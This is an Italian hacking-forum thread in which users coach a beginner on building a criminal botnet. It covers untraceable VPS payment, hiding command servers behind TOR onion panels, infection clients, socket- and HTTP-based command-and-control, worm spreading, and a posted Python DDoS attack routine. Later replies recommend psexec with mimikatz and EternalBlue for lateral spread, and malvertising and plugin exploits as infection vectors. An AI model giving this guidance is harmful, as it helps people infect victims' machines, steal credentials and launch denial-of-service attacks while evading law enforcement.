Domanda Dove acquistare VPS per creare una botnet?

[Bart_]

Salve,
Volevo iniziare a creare una botnet perché sono molto affascinato da questo mondo.
Le mie domande sono:
- Da che siti posso reperire delle VPS da poter utilizzare nella botnet?
- Che tool/programma/script posso utilizzare? Ho visto e letto la guida sul forum su come creare una botnet, ma non mi è ancora tutto molto chiaro.
- System Requirements di una VPS per poter essere utilizzata nella botnet?

Grazie a tutti per l'aiuto, spero di apprendere meglio il funzionamento e altre informazioni riguarda ad una botnet [emoji4]

Inviato dal mio SM-G930F utilizzando Tapatalk

 

[Zeta 3.14]

Sottoscrivo, sono interessato anche io


Alessandro Nava

 

[Gorate]

- Da che siti posso reperire delle VPS da poter utilizzare nella botnet?

Per quanto riguarda comprare/avere delle VPS, la cosa migliore e' sicuramente adottare un pc in ufficio con modem forwardato lontano dalla propria citta' che funga da server; Non so' se hai anche saputo che di recente, parte degli attacchi informatici sono stati condtti anche da VPS amazon e google , in questo modo devi essere pero' molto bravo a non lasciare tracce, devi pagare con metodi abbastanza ifficili per non farti scoprire..... comunque sarebbe [almeno come restazioni] molto piu' economico e vantaggiosa una VPS google/amazon piuttosto che un tuo pc in un ufficio altrui con scarsa connessione.....come detto pero' devi stare attento a quando pagherai il tutto.

Che tool/programma/script posso utilizzare?

Allora, se ne vuoi gia' uno preconfezionato, ti basta cercare per qualche oretta su internet e ne trovi una buona; Le botnet migliori [magari cominci a cercare proprio da queste], sono sicuramente Zeus e vertexnet, di altre non ricordo il nome [o lameno momentaneamente]; Se invece vuoi crearlo tu un tool, allora ti dico che devi conoscere un po' di php [se vuoi fare un pannello web con richieste get/post], altrimenti puoi anche solo conoscere python e gia' puoi fare qualcosina: fai un socket su cui ricevere le info [socket di ascolto], lo fai in modo che possa mandare anche comandi [socket commands master], fai un db dal quale memorizzare i dati; Una buona idea sarebbe anche quella di configurara per TOR, in mdo da non essere subito riconoscibile ed in modo che anche tu sei piu' protetto [senno' quando vai a vedere la macchina, questa ti prende l IP e successivamente ti bannano la VPS [quindi diciamo che sotto questo punto di vista VPS altrui sono svantaggiose], infatti devi mandare attacchi potenti e diretti, perche' se fai qualcosa di grande, dopo 24h non solo ti hanno rimosso le VPS, ma ti hanno anche arrestato.
Per quanto riguarda la botnet in se', se vuoi qualcosa di piu' interessante, una bella visitatina del deep e trovi abbastanza source.
L' ultima parte della botnet, e' il vettore d' attacco : il client che tu mandi alle macchina per infettarle e per farle eseguire i comandi : farlo in python potrebbe essere un po' troppo .....banale/non funzionale/facimente smascherabile, comunque come inizio lo puoi fare, ma se poi vuoi fare qualcosa di piu' ....interessante, ti consiglio di farlo in c, o al massimo un linguaggio abbastanza diffuso e potente O che lavora a basso livello [vedi c,c++,vb,ecc...].

System Requirements di una VPS per poter essere utilizzata nella botnet?

Per quanto riguarda le specifiche di sistema consigliate : piu' alte sono meglio e' ...... , comunque una buona botnet dovrebbe essere performante [quindi un buon processore [tanto usano gli xeon ...]], tanta ram [minimo 32gb] e la cosa piu' importante: la connessione veloce e performante 25h/24 : se non hai traffico per gestire i bot e per mandare attacchi, puoi avere la cosa piu' bella del mondo ma non vai da nessuna parte.....proprio per questo ti coniglio amazon/google : processori intel xeon e ultra giga di velocita' internet.

spero di apprendere meglio il funzionamento e altre informazioni riguarda ad una botnet

Per quanto riguarda cio' : penso che la pagina di wikipedia tu l abbia gia' letta..., quindi partimo dal presupposto che [senza spenderci troppe parole], la botnet e' un insieme di pc controllati da un bot master che impartisce i comandi da egffettuare; Tralasciamo la storia [per la prima volta fu' adottata da un ragazzetto come noi [o almeno penso tu sia ancora giovane ahaha], e diciamo che una botnet e' composta da:

1. Interfaccia web
2. Vettore di propagazione
3. Software bot master per la gestione dei dispositivi
4. Client di infezione [il file infetto che mandi]

Come detto, una botnet molto semplicemente segue questa procedura:

• Vengono infettate delle vittime con il client attraverso social engineering, mail di massa, pubblicita' infettive e molto altro
• Il client esegue la connessione al socket server che poi manda le info al tool del botmaster , il quale appunto va' a riportare il tutto ad un web panel/socket di amministrazione dei bot.
• Il software e' corredato di un ampio "arsenale" di comandi gia' preimpostati, che serve per automatizzare il avoro di aprire tutti i 1000000 bot ed eseguire il comando "sysinfo" sulle macchina infette [oppure solo su alcune di queste].
• Data la enorma potenza di calcolo che poi si raggiunge con una botnet, si puo' :

1. Minare bitcoin o altre virtual money
2. Fare attacchi dos/ddos
3. Eseguire spam da adottare come vettore ulteriore di malware [vedi Avalanche]

Per eseguire attacchi DOS/DDOS, la cosa piu' importante e' sicuramente una buona connessione e un tool di dossing efficace.
Se stai pensando di uppare un dosser in ogni macchina, la cosa sarebbe dispendiosa, inoltre non servirebbe avviarne 1000 su una macchina perche' tanto il traffico e' quello.

Per altre info sono a tua disposizione

 

[Bart_]

@Gorate wow grazie mille, la mia idea era quella di comprare tante vps piccole/modeste da tipo 1GB di ram e farle diventare parte della botnet. Secondo te può funzionare? Alla fine penso che l'importante sia la banda di una VPS (forse sbaglio). Per quale motivo servono macchine con tanta ram? Non ne vedo il motivo

Inviato dal mio SM-G930F utilizzando Tapatalk

 

[Gorate]

la mia idea era quella di comprare tante vps piccole/modeste da tipo 1GB di ram e farle diventare parte della botnet. Secondo te può funzionare?

Secondo me si', puo' funzionare, ma sicuramente con poca potenza di calcolo, resta comunque una cosa limitata, anche se comunque come detto, la cosa piu' importante e' la banda, poi certo, serve anche la fluidita' e la potenza per poter mandare tanti pacchetti. Comunque si, funzionerebbe eccome, anche perche' tanto sicuramente sarebbero olto piu' potenti [parlando di netwrok, non di potenza] dei pc che magari infetti : uno in burundi infettato con velocita' di 2mbps , non ci fai nulla....

Alla fine penso che l'importante sia la banda di una VPS (forse sbaglio)

Come detto si, la cos importante e' a banda, ma anche la potenza di calcolo del pc infettato.

Per quale motivo servono macchine con tanta ram?

Diciamo che devi far girare il programma [un bel socket ascolta/manda delle info o dei comandi ........devi avere [intendo nella vps mater bot] un bel po' di ram per gestire il socket che riceve molte connessioni, che deve mandare e ricevere comandi, che deve essere magari sotto rete tor, che deve eseguire il tutto per 24h su 24.....
Comunque 32gb forse ho esagerato un po' [io intendevo a grandi vedute], ma se vuoi fare qualcosa di piu......limitato , anche 16 gb vanno bene, per quanto detto, poi il processore ormai e' xeon ...quindi puoi stare comunue tranquillo perhe' la ram se la gestisce bene [per quello che deve fare]

 

[Raydar]

Come vps cercati qualcosa di offshore su internet

 

[Bart_]

Penso che seguirò questo tutorial http://www.hacking-tutorial.com/hacking-tutorial/remote-administration-tool-zeus-botnet-rat/ e userò come vps quelle di hostens.com

Inviato dal mio SM-G930F utilizzando Tapatalk

 

[Bart_]

Domanda: nella guida che ho linkato prima il client bot funziona solo su Windows (bot.exe). Come potrei fare se lo volessi far funzionare anche su linux? Grazie

Inviato dal mio SM-G930F utilizzando Tapatalk

 

[Gorate]

Domanda: nella guida che ho linkato prima il client bot funziona solo su Windows (bot.exe). Come potrei fare se lo volessi far funzionare anche su linux? Grazie

Inviato dal mio SM-G930F utilizzando Tapatalk

Dovresti convertire il rat da .exe a .sh [non nel modo banale che pensano molti su questo foum....] : dovresti riscriverlo usando o c e poi compilandolo per linux, oppure riscriverlo in un altro linguaggio supportato da ambedue le piattaforma: ad esempio python,c,go.......in questo modo ci fai un affarone.
Per quanto riguarda cio' , diciamo che bot.exe fa' cosi' : infetta la vittima e contatta il socket/il server attraverso get/post e gli dice:
"Bella, io sono entrato nel pc, ora se mi mandi i comandi io li eseguo per benino e ti riporto l output".
Detto cio' farlo in python sarebbe bellissimo e forse anche piu' semplice di farlo in c .........

 

[Anianded]

Ho seguito interessato il post e le brillanti risposte di @Gorate che ringrazio (anche se non sono l'autore del post) di condividere il tuo sapere. Comunque, se puoi, mi daresti delle delucidazioni?

Se stai pensando di uppare un dosser in ogni macchina, la cosa sarebbe dispendiosa, inoltre non servirebbe avviarne 1000 su una macchina perche' tanto il traffico e' quello.

In questo caso cosa si fa se tu sconsigli di uppare lo script per gli attacchi dos ad ogni zombie?


Per il resto, ancora non mi è ancora chiara la parte tecnica della creazione e dialogo tra piattaforma di controllo e zombies. Allora, io mando in un modo o nell'altro un file che eseguito nella macchine vittime le infetta. Questa "infezione" di cui parliamo, cosa comprende? Semplicemente il file si annida nel pc e viene eseguito ad ogni avvio e serve da ascolto per i comandi che l'attaccante vuole impartire? Poi, come funziona la comunicazione tra attaccante e i membri della rete zombies? Mettiamo caso che l'attaccante vuole far partire un attacco ddos con tutti gli zombies della botnet. La comunicazione tramite che protocollo avviene? HTTP ne dubito, visto che è un protocollo limitato al word wide web. Quindi se non è HTTP, come impartiamo i comandi? Tramite che porta? In che modo?

Ultima cosa, per chi è alle prime armi e vuole esercitarsi semplicemente, si potrebbe anche evitare di fare un pannello php dove controllare i bot a distanza e fare il tutto semplicemente da riga di comando?
Grazie in anticipo!

 

[Gorate]

Ho seguito interessato il post e le brillanti risposte di @Gorate che ringrazio (anche se non sono l'autore del post) di condividere il tuo sapere. Comunque, se puoi, mi daresti delle delucidazioni?



In questo caso cosa si fa se tu sconsigli di uppare lo script per gli attacchi dos ad ogni zombie?


Per il resto, ancora non mi è ancora chiara la parte tecnica della creazione e dialogo tra piattaforma di controllo e zombies. Allora, io mando in un modo o nell'altro un file che eseguito nella macchine vittime le infetta. Questa "infezione" di cui parliamo, cosa comprende? Semplicemente il file si annida nel pc e viene eseguito ad ogni avvio e serve da ascolto per i comandi che l'attaccante vuole impartire? Poi, come funziona la comunicazione tra attaccante e i membri della rete zombies? Mettiamo caso che l'attaccante vuole far partire un attacco ddos con tutti gli zombies della botnet. La comunicazione tramite che protocollo avviene? HTTP ne dubito, visto che è un protocollo limitato al word wide web. Quindi se non è HTTP, come impartiamo i comandi? Tramite che porta? In che modo?

Ultima cosa, per chi è alle prime armi e vuole esercitarsi semplicemente, si potrebbe anche evitare di fare un pannello php dove controllare i bot a distanza e fare il tutto semplicemente da riga di comando?
Grazie in anticipo!

Proseguiamo per passi: innanzitutto, grazie per i complimenti, ma a me piace questa "materia", quindi quando scrivo non mi fermo piu' lol.

Poi:

In questo caso cosa si fa se tu sconsigli di uppare lo script per gli attacchi dos ad ogni zombie?

Ti riporto il codice e ti spiego meglio:

   """
   Perform the attack on the specified target's port at the given time.
   """
   def attack(self, target, atkTime):
      atkTimeStr = Util.formatTimeMS(atkTime)

      print 'Going to attack Target @ %s:%d on ' \
         % (target[0], target[1]) + atkTimeStr + '\n'

      # account for the time difference between bot and master
      waitTimeMilSecs = long(atkTime) -  (Util.getCurrTime() + offset)

      if waitTimeMilSecs < 0:
         print 'Missed the attack :-('
         return

      print 'Sleeping for [msec]: ', waitTimeMilSecs

      # wait
      waitTimeSecs = float(waitTimeMilSecs)/1000
      time.sleep(waitTimeSecs)

      # wait complete, connect to target
      print 'Connecting to Target @ %s:%d...' % (target[0], target[1])
      targetSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      targetSocket.connect((target[0], target[1]))
      print 'Connected'

      # perform attack for 30 seconds
      startTime = time.time()
      timeout = 30
      print 'Attacking for', timeout, 'seconds...'
      while time.time() < startTime + timeout:
         time.sleep(rate) # send message every second
         Util.send(targetSocket, 'You\'re being attacked!!!')
      print 'Attack finished'

      targetSocket.close()

Questa e' la parte di una botnet in python "educativa" : io non cosniglio di uppare perche' maggiori precauzioni prese dopo un eventuale scoperta di essere stati infettati, potrebbe soltanto lasciare piu' tracce di cosa vogliamo fare, di cosa puntiamo e magari di noi stessi; Una buona prassi e' quella di integrare il "dosser" prprio all' interno del vettore di infezione in modo da evitare ulteriori problemi: se il tuo obbiettivo e' solo dossare e non fare null' altro, e' inutile lasciare tracce ed infettare con qualcosa che poi non sara' funzionale.
Il discorso cambia se invece la botnet la devi adottare piu' per "spionaggio" e solo eventualmente per ddos: in questo caso sarebbe bene creare un vettore di infezione che monitora le attivita' base della macchina infetta: esempio spento, accesso, connesso ad internet, che ora ha, timezone,cmd generale,upload e poc altro, poi adottare questo controllo "basico" della macchina per eseguire invece comandi piu' complessi attraverso delle estensioni, come quelle per gli screenshot, quelle per il ddos, quelle per il download di file da macchina ecc......

Questa "infezione" di cui parliamo, cosa comprende? Semplicemente il file si annida nel pc e viene eseguito ad ogni avvio e serve da ascolto per i comandi che l'attaccante vuole impartire?

Qunto detto prima penso sia' la intro: come detto e' meglio stabilire un contatto diretto con un vettore gia' "armato" se si ha intenzione di eseguire azioni automatizzate e non vuoi accesso alla macchina in se' [nel senso non vuoi fare screen,audio record ecc.....], quindi puntare subito al sodo; Mentre nel caso in cui vuoi fare piu' "attivita' di spionaggio" e non hai un' idea precisa in mente, lla cosa migliore e' creare un vettore con comandi base che eviti di farsi scoprire e che adotti per operazioni piu' complesse delle "estensioni".

Poi, come funziona la comunicazione tra attaccante e i membri della rete zombies?

Questo lo imposti tu: le 2 alternative piu' valide sono

1. Attraverso richieste GET/POST e script php nel server di ricezione delle informazioni: in parole povere, sarebbe come dire di fare una cosa del genere:

      non mi fa' postare nulla.....         command = requests.get(settings.SERVER_URL + "/api/pop?botid=" +id+infosistema+piattaforma+altri+dati

   , in questo modo dicimo proprio come succede con le credenziali di un sito, solo che non viene interrogato un db, ma la macchina stessa allega le informazioni che invia poi al master.
2. Attraverso socket di ricezione delle info: in questo caso la cosa e' praticamente la stessa, solo che non funge tramite richieste get e post ma tramiteflussi di dati fra master bot e bot zombie.

Mettiamo caso che l'attaccante vuole far partire un attacco ddos con tutti gli zombies della botnet. La comunicazione tramite che protocollo avviene?

Allora, quello che hai detto e' impossibile lol, nel senso che mai tutti i bot di una botnet saranno attivi [almeno che non si usano dispositivi ioT]; Per quanto detto cio', si : le botnet si suddividono principalemnte in 3 modi: IRC, HTTP,HTTPS;
Le preferite [nel senso le piu' adottate] sono quelle HTTP: facili da usare, efficaci e piu' potenti di quelle IRC, piu' semplici da adottare delle HTTPS. Per quanto riguarda cio', poi ci sono vari attacchi ddos : udp, tcp ecc......., essi agiscono solo su alcuni protocolli, ma ti dico che HTTP e' il migliore [o almeno penso].

HTTP ne dubito, visto che è un protocollo limitato al word wide web. Quindi se non è HTTP, come impartiamo i comandi? Tramite che porta? In che modo?

Per quanto detto, si: HTTP, poi che significa "limitato al word wild web" ??? I comandi come detto vengono impartiti tramite accesso generale al cmd dei bot o tramite altri escamotage: questi li devi trovare tu progettatore, come mail contenenti comandi ecc......
La porta ecc...., lo decidi sempre tu con il vettore: ti cosngilio di dare un' occhiata a qualche source, ti schiarisce molto le idee, e sono abbastanza semplici dato che l' 80% dei comandi sono: sysinfo, ls, dir, GET_['info'] ecc....

Ultima cosa, per chi è alle prime armi e vuole esercitarsi semplicemente, si potrebbe anche evitare di fare un pannello php dove controllare i bot a distanza e fare il tutto semplicemente da riga di comando?
Grazie in anticipo!

Io sinceramente non vedo da difficolta', in quanto php dovresti sfruttare post/get, quindi per forza web developer, mentre come dici tu, si' si potrebbe fare con i socket: fai un socket di ascolto/master bot, con menu' ricorsivo per scegliere quali estensioni/comandi dare ed hai fatto.
Per altre info sono sempre qui

 

[Anianded]

Proseguiamo per passi: innanzitutto, grazie per i complimenti, ma a me piace questa "materia", quindi quando scrivo non mi fermo piu' lol.

Poi:


Ti riporto il codice e ti spiego meglio:

   """
   Perform the attack on the specified target's port at the given time.
   """
   def attack(self, target, atkTime):
      atkTimeStr = Util.formatTimeMS(atkTime)

      print 'Going to attack Target @ %s:%d on ' \
         % (target[0], target[1]) + atkTimeStr + '\n'

      # account for the time difference between bot and master
      waitTimeMilSecs = long(atkTime) -  (Util.getCurrTime() + offset)

      if waitTimeMilSecs < 0:
         print 'Missed the attack :-('
         return

      print 'Sleeping for [msec]: ', waitTimeMilSecs

      # wait
      waitTimeSecs = float(waitTimeMilSecs)/1000
      time.sleep(waitTimeSecs)

      # wait complete, connect to target
      print 'Connecting to Target @ %s:%d...' % (target[0], target[1])
      targetSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      targetSocket.connect((target[0], target[1]))
      print 'Connected'

      # perform attack for 30 seconds
      startTime = time.time()
      timeout = 30
      print 'Attacking for', timeout, 'seconds...'
      while time.time() < startTime + timeout:
         time.sleep(rate) # send message every second
         Util.send(targetSocket, 'You\'re being attacked!!!')
      print 'Attack finished'

      targetSocket.close()

Questa e' la parte di una botnet in python "educativa" : io non cosniglio di uppare perche' maggiori precauzioni prese dopo un eventuale scoperta di essere stati infettati, potrebbe soltanto lasciare piu' tracce di cosa vogliamo fare, di cosa puntiamo e magari di noi stessi; Una buona prassi e' quella di integrare il "dosser" prprio all' interno del vettore di infezione in modo da evitare ulteriori problemi: se il tuo obbiettivo e' solo dossare e non fare null' altro, e' inutile lasciare tracce ed infettare con qualcosa che poi non sara' funzionale.
Il discorso cambia se invece la botnet la devi adottare piu' per "spionaggio" e solo eventualmente per ddos: in questo caso sarebbe bene creare un vettore di infezione che monitora le attivita' base della macchina infetta: esempio spento, accesso, connesso ad internet, che ora ha, timezone,cmd generale,upload e poc altro, poi adottare questo controllo "basico" della macchina per eseguire invece comandi piu' complessi attraverso delle estensioni, come quelle per gli screenshot, quelle per il ddos, quelle per il download di file da macchina ecc......



Qunto detto prima penso sia' la intro: come detto e' meglio stabilire un contatto diretto con un vettore gia' "armato" se si ha intenzione di eseguire azioni automatizzate e non vuoi accesso alla macchina in se' [nel senso non vuoi fare screen,audio record ecc.....], quindi puntare subito al sodo; Mentre nel caso in cui vuoi fare piu' "attivita' di spionaggio" e non hai un' idea precisa in mente, lla cosa migliore e' creare un vettore con comandi base che eviti di farsi scoprire e che adotti per operazioni piu' complesse delle "estensioni".



Questo lo imposti tu: le 2 alternative piu' valide sono

1. Attraverso richieste GET/POST e script php nel server di ricezione delle informazioni: in parole povere, sarebbe come dire di fare una cosa del genere:

      non mi fa' postare nulla.....         command = requests.get(settings.SERVER_URL + "/api/pop?botid=" +id+infosistema+piattaforma+altri+dati

   , in questo modo dicimo proprio come succede con le credenziali di un sito, solo che non viene interrogato un db, ma la macchina stessa allega le informazioni che invia poi al master.
2. Attraverso socket di ricezione delle info: in questo caso la cosa e' praticamente la stessa, solo che non funge tramite richieste get e post ma tramiteflussi di dati fra master bot e bot zombie.

Allora, quello che hai detto e' impossibile lol, nel senso che mai tutti i bot di una botnet saranno attivi [almeno che non si usano dispositivi ioT]; Per quanto detto cio', si : le botnet si suddividono principalemnte in 3 modi: IRC, HTTP,HTTPS;
Le preferite [nel senso le piu' adottate] sono quelle HTTP: facili da usare, efficaci e piu' potenti di quelle IRC, piu' semplici da adottare delle HTTPS. Per quanto riguarda cio', poi ci sono vari attacchi ddos : udp, tcp ecc......., essi agiscono solo su alcuni protocolli, ma ti dico che HTTP e' il migliore [o almeno penso].

Per quanto detto, si: HTTP, poi che significa "limitato al word wild web" ??? I comandi come detto vengono impartiti tramite accesso generale al cmd dei bot o tramite altri escamotage: questi li devi trovare tu progettatore, come mail contenenti comandi ecc......
La porta ecc...., lo decidi sempre tu con il vettore: ti cosngilio di dare un' occhiata a qualche source, ti schiarisce molto le idee, e sono abbastanza semplici dato che l' 80% dei comandi sono: sysinfo, ls, dir, GET_['info'] ecc....

Io sinceramente non vedo da difficolta', in quanto php dovresti sfruttare post/get, quindi per forza web developer, mentre come dici tu, si' si potrebbe fare con i socket: fai un socket di ascolto/master bot, con menu' ricorsivo per scegliere quali estensioni/comandi dare ed hai fatto.
Per altre info sono sempre qui

scusa il ritardo ma ho visto solo ora la risposta, grazie mille!! in caso se ho dubbi scrivo qua

 

[Anianded]

@Gorate quindi, le botnet non HTTP o IRC, che funzionano tramite riga di comando, per esempio scritte in python, si chiamano in un modo particolare? O non hanno un nome come le HTTP e IRC?

 

[Gorate]

@Gorate quindi, le botnet non HTTP o IRC, che funzionano tramite riga di comando, per esempio scritte in python, si chiamano in un modo particolare? O non hanno un nome come le HTTP e IRC?

Non e' che sono proprio "da riga di comando" : non e' l' interfaccia la cosa differente, ma il metodo di trasmissione: che adotta un socket per ricevere ed inviare [che quindi puoi gestire da terminale] e non le richieste get/post che invece gestisci tramite script in php e pagine web;
La cosa differente e' proprio questa, poi il resto non cambia nel funzionameto:
c'e' un bot master che impartisce comandi e vari zombie che li eseguono; L' unica cosa che cambia e' proprio il metodo di trasmissione delle info che invece di essere cosi' :

esempio:

botmasterserver.onion/receive.php?out=......_command=ls_command2=get.timezone().....ecc....
o
botmasterserver.onion/command.php?command=ls
[con richieste get e post],

diventa:

con i socket: socket che riceve e manda comandi ------vps/tor/proxy/altro -------- socket aperto dalla vittima che invia la richiesta di connessione

[lo dovresti poter leggere dall inizio alla fine e dalla fine all inizio: segue entrambe le direzioni, solo con scopi diversi: dall inizio alla fine nel caso di invio di comandi; Dalla fine all' inizio in caso di ricezione di output e/o richieste di comandi ecc........]

Ma resta tutto sattamente come se fosse una botnet "normale" : puo' essere anche IRC od HTTP, ma cambia il metodo di ricezione/trasmissione [come barbaramente illustrato sopra]

 

[Sinnex]

Usa qBOT | Mirai se vuoi usare IoT
Usa amplification se non sai fare un pazzo
Usa HTTP se hai un crypter e traffico.
Non fare niente se sei uno script kiddie.

 

[Anianded]

Non e' che sono proprio "da riga di comando" : non e' l' interfaccia la cosa differente, ma il metodo di trasmissione: che adotta un socket per ricevere ed inviare [che quindi puoi gestire da terminale] e non le richieste get/post che invece gestisci tramite script in php e pagine web;
La cosa differente e' proprio questa, poi il resto non cambia nel funzionameto:
c'e' un bot master che impartisce comandi e vari zombie che li eseguono; L' unica cosa che cambia e' proprio il metodo di trasmissione delle info che invece di essere cosi' :

esempio:

botmasterserver.onion/receive.php?out=......_command=ls_command2=get.timezone().....ecc....
o
botmasterserver.onion/command.php?command=ls
[con richieste get e post],

diventa:

con i socket: socket che riceve e manda comandi ------vps/tor/proxy/altro -------- socket aperto dalla vittima che invia la richiesta di connessione

[lo dovresti poter leggere dall inizio alla fine e dalla fine all inizio: segue entrambe le direzioni, solo con scopi diversi: dall inizio alla fine nel caso di invio di comandi; Dalla fine all' inizio in caso di ricezione di output e/o richieste di comandi ecc........]

Ma resta tutto sattamente come se fosse una botnet "normale" : puo' essere anche IRC od HTTP, ma cambia il metodo di ricezione/trasmissione [come barbaramente illustrato sopra]

Grazie come sempre, ma quindi, queste botnet spartane non HTTP e IRC che interagiscono come hai descritto tu, hanno un nome particolare?

 

[Anianded]

Usa qBOT | Mirai se vuoi usare IoT
Usa amplification se non sai fare un pazzo
Usa HTTP se hai un crypter e traffico.
Non fare niente se sei uno script kiddie.

per l'amplification c'è bisogno di spoofare l'ip, e ormai tutti gli isp bloccano tutti i tentativi di spoofing. L'unica cosa sarebbe acquistare dei bulletproof hosting off shore... Non credo che eseguire un amplification sia così facile

 

[Gorate]

Usa qBOT | Mirai se vuoi usare IoT
Usa amplification se non sai fare un pazzo
Usa HTTP se hai un crypter e traffico.
Non fare niente se sei uno script kiddie.

Lol, ma cosi' scoraggi la gente comunque, io consiglio di apprendere per bene il funzionamento delle botnet, poi analizzare per bene il codice di una delle grandi botnet: vedi athena http o ddos zeus [zeus fu' anche una botnet per stilare dati bancari] poi in un secondo momento provare a crearne una tutt propria, ma senza un esempio e senza comprendere come funge una cosa, e' inutile perdere tempo e risorse. Consiglio vivamente inoltre di tentare anche una semplice botnet con get/post : alla fine con pochi smeplici script in php ti fai qualcosa di indecente, ma almeno ne comprendi il funzionamento, poi per favore non fate come fanno molti : ma come faccio a settarlo in remoto ? : dico subito come cosi' nessuno fa' la solita domanda:

• Ti affitti una vps no logs gestita da te stesso,
• Setti tutto sotto TOR [sul forum ci sono 384827528 post su come far passare tutto sotto TOR]
• Rendi il tutto con richieste get/post che sono migliori da gestire
• Preferibilmente adottare sito onion con pannello di controllo integrato per evitare reversing di connessione che riportino direttamente a te

Inoltre, cominciate sempre da locale: subito da remoto non ci fate un tubo dato che non avete vittime e che il vettore di infezione e' abbastanza semplice [inizialmente]; Inoltre dovreste avere vps e molta pazienza, che verrebbero sprecate dato che potreste fare l' equivalente in locale [dato che se dovete dossar un pc in locale non forwardato non potete dato che non e' raggiungibile dai bot esterni alla vostra rete], ma almeno ci riuscite .................quindi in locale please

Aggiugo che la cosa migliore da inserire in primis in una botnet e' la shell comune; Poi tutto il resto, ma questa e' la cosa piu' utile dato che non penso vogliate aprire il terminale di ogni singolo target ed eseguire un comando........ripetendo questa prassi per tutti i pc che avete infettato: anche solo 2 io mi sarei scocciato di farlo lol

Si consiglia la creazione del tutto con moduli aggiuntivi se non si ha un obbiettivo primario: l' esecuzione di moduli e' la cosa piu' comoda, ordinata e semplice: bisogna sempre spartire in piccole parti un problema.....come in programmazione.

E poi il consiglio piu' importante: se avete 2 bot e state dossando il google, e quando ricaricate la pagina questa mostra l' errore "site down or control your connection" , seguite il secondo consiglio e scartate a priori il primo: non illudetevi, google non si puo' downare con 2 bot [neanche con 100], e neanche un qualsiasi altro sito con soli 2 bot. lol
Per altre info ci sono sempre [o per lo meno appena riesco a staccare un attimo]

 

[Anianded]

Grazie come sempre, ma quindi, queste botnet spartane non HTTP e IRC che interagiscono come hai descritto tu, hanno un nome particolare?

Deduco che non abbiano un nome quindi lol

 

[Gorate]

Deduco che non abbiano un nome quindi lol

Lol scusami: ho detto tante cose ma non ti ho risposto, ora rimedio:

allora di per se' non avrebbero un nome particolare........ma potresti provare a cercare cose come "botnet socket", poi sei tu che decidi se il socket lo controlli da riga di comando, da terminale o da gui grafica/pannello di controllo......, proprio come detto prima;
Un nome per la ricerca su google quindi potrebbe essere :

• Botnet socket
• botnet socket gui
• botnet from command line
  
• botnet from terminal
  
• botnet socket from terminal

[Queste sono keyword per cercare materiale inerente su google e simili............]

 

[ScriptMan]

Deduco che non abbiano un nome quindi lol

Aspetta quello che tu intendi non è il nome della botnet ma del protocollo con cui esse operano ci sono botnet che operano con protocollo http e si chiamano così come botnet che operano attraverso irc; diciamo che in questo caso il protocollo fa il monaco

 

[Gorate]

Comunque, il modo migliore per ottenere tanti bot e' attraverso un vettore di infezione worm: piu' si diffonde e meglio e', quindi la progettazione di un buon worm e' quasi piu' importante del software che userai per amministrarla.
Consiglio un worm fatto in linguaggi a basso livello, poi magari anche python, ma c e c++ sono imbattibili in cio' ; Magari sfruttando la solita condivisione mail e la propagazione in rete del file tramite condivisione.
Poi se magari trovi qualche vulnerabilita' e' ancora meglio, perche' li' puoi sbizzarrirti..............

 

[ScriptMan]

Comunque, il modo migliore per ottenere tanti bot e' attraverso un vettore di infezione worm: piu' si diffonde e meglio e', quindi la progettazione di un buon worm e' quasi piu' importante del software che userai per amministrarla.
Consiglio un worm fatto in linguaggi a basso livello, poi magari anche python, ma c e c++ sono imbattibili in cio' ; Magari sfruttando la solita condivisione mail e la propagazione in rete del file tramite condivisione.
Poi se magari trovi qualche vulnerabilita' e' ancora meglio, perche' li' puoi sbizzarrirti..............

Riprendendo il discorso di Gorate io per lo spreading oltre alle classiche mail infette consiglio come in Letta in lan il tool microsoft psexec con mimikatz per recuperare le password necessarie del pc in cui lanci l`attacco e in wan eternalblue stile Wanncry stamattina sono dovuto partire presto dopo ti lascio tutta la documentazione

 

[ScriptMan]

https://nakedsecurity.sophos.com/20...g-petya-how-it-spreads-and-how-to-fight-back/ questo è per psexec e questo è per eternalblue direttamente dal blog malwarebytes https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/ sono documentazioni teoriche naturalmente la pratica devi metterla te

 

[Gorate]

https://nakedsecurity.sophos.com/20...g-petya-how-it-spreads-and-how-to-fight-back/ questo è per psexec e questo è per eternalblue direttamente dal blog malwarebytes https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/ sono documentazioni teoriche naturalmente la pratica devi metterla te

Buono, mi hai tolto i link di mano lol ; Comunque la cosa che vi fa' capire che questa vulnerabilita' e' ancora ampiamente sfruttabile e' il fatto che dopo il terribile attacco di wannacry, pochissimi pc erano stati patchati, tanto che NotPetya, che colpi' una decina di giorni dopo, riusci ad insediarsi in ben 140 nazioni, ed in moltissimi pc, quasi come il suo predecessore...........quindi se non basta un ransomware per farti patchare il pc...........non so' cosa .
Ti consiglio anche di controllare un vettore di diffusione a "grandi vedute" : un servizio che ora e' down, si chiamava Avalanche [significa valanga], sfruttava una piattaforma per diffondere virus altrui tramite varie vulnerabilita' che ora elenco:

• Pubblicita' infette negli AD di siti per adulti e poco controllati
• Siti gia' exploitati come vettori di diffusione per mandare email infette
• Vulnerabilita' nei pdf viewer [injectavano codice infetto appena si apriva il file da browser], nei plugin chrome e firefox, nei plugin wordpress per riuscire ad insediarsi nel sito per poter poi mandare altre mail
• Sfruttava veri e propri siti con ip grab per trovare l' IP di coloro che vi andavano sopra, per poi tracciare una "mappa" delle sue "preferenze" [questo solo in caso di bersagli scelti]
• Diffusione in rete ed un tool molto simile a quello pubblicato da wikileaks dopo l' attacco alla CIA: praticamente il malintenzionato "fondeva" il proprio virus con un tool che appena aperto il file maelvolo, andava a creare una rete parallela in ascolto, che poi andava a vedere il traffico degli altri pc, e da qui, injectava codice malevolo come ad esempio la modifica di html in entrata nella macchina con applet infetto.....ed alti escamotage

Proprio quest' ultimo e' stato una rivoluzione proprio perche' se si capita in un grande range con moltissimi pc [vedi universita', studi di professionali o aziende], da un solo pc si puo' arrivare ad infettare piu' di 20/50/100 pc , con un solo attacco.
Altre tecniche potrebbero essere il redirecting verso siti satellite infetti con applet o js malevoli.
Per altre info siamo sempre qui